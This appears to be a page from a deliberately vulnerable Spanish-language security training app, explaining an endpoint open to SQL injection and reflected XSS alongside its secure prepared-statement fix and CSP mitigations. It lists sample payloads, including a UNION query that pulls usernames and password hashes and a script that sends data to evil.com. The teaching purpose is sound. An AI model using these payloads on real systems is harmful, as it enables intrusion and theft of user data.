Resultados de Busqueda

Busqueda:

Nueva busqueda

No se encontraron clientes con ""

Payloads de ejemplo

SQL Injection

XSS (mitigado con CSP + HttpOnly)

A05:2025 Intermedia

🔴 VULNERABLE

Injection

Este endpoint es doblemente vulnerable:

SQL Injection: La query se arma concatenando el input directamente
XSS reflejado: Los resultados se muestran sin escapar

Mitigacion aplicada: CSP bloquea conexiones externas + cookie HttpOnly. El XSS ejecuta (alert funciona) pero no puede robar sesion ni contactar servidores externos.

# Ver todos los clientes (bypass del filtro)
?q=' OR '1'='1

# Extraer tabla users con UNION
?q=' UNION SELECT id,username,password_md5,email,role,created_at,7,8 FROM users-- 

# XSS basico (FUNCIONA - el alert se ejecuta)
?q=<script>alert('XSS ejecutado!')</script>

# XSS robo de cookie (FALLA - cookie es HttpOnly)
?q=<script>alert(document.cookie)</script>
# Resultado: cookie vacia porque es HttpOnly

# XSS exfiltracion (BLOQUEADO por CSP)
?q=<script>fetch('http://evil.com/steal?data=test')</script>
# Resultado: CSP bloquea la conexion externa

Herramientas: SQLMap Burp Suite curl

// ESTE ARCHIVO (vulnerable pero mitigado):
// CSP: script-src 'self' 'unsafe-inline'; connect-src 'self'
// Cookie: HttpOnly + SameSite=Strict

// El XSS ejecuta PERO:
// - No puede leer document.cookie (HttpOnly)
// - No puede hacer fetch() a externos (CSP connect-src)
// - No puede cargar scripts externos (CSP script-src)

// buscar_secure.php (seguro):
$stmt = $pdo->prepare("SELECT * FROM clients WHERE name LIKE ?");
$stmt->execute(['%' . $search . '%']);
echo htmlspecialchars($row['name']); // CON escapar

Equifax (2017)

147 millones de personas afectadas. Injection en Apache Struts. $1.4B en costos.

CWEs: CWE-89 CWE-79

🛡️ Ver versión segura